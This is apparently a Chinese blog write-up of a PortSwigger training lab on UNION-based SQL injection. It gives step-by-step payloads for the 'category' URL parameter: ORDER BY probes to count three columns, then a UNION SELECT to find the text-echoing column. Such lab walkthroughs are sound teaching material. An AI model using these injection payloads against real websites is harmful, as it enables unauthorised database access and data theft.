bp靶场---SQL注入第八关

Lab: SQL injection UNION attack, finding a column containing text

传送门:https://portswigger.net/web-security/sql-injection/union-attacks/lab-find-column-containing-text

看一下本关描述

简单来说就是判断回显点在哪,然后把他提供的随机字符串或者什么随机值给在那个回显点给回显出来即可

开始练习

第一步:判断注入点

随便点几下,发现url有参数控制,所以测试url有无注入点,直接在后面输入单引号--+,发现回显在标题,所以这里有注入点

第二步:判断联合查询的列数

我这里使用order by进行判断

category=Gifts' order by 1--+

category=Gifts' order by 2--+

category=Gifts' order by 3--+

都回显正常

category=Gifts' order by 4--+的时候出现错误,所以联合查询的列数只有3个

第三步:判断回显点

使用category=Gifts' union select '888','555','666'--+判断出只有555那个位置回显了,所以回显点在那里

第四步:将系统提供的数值在那里回显即可

将pt6l9C放到第二个位置即可

完成!

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值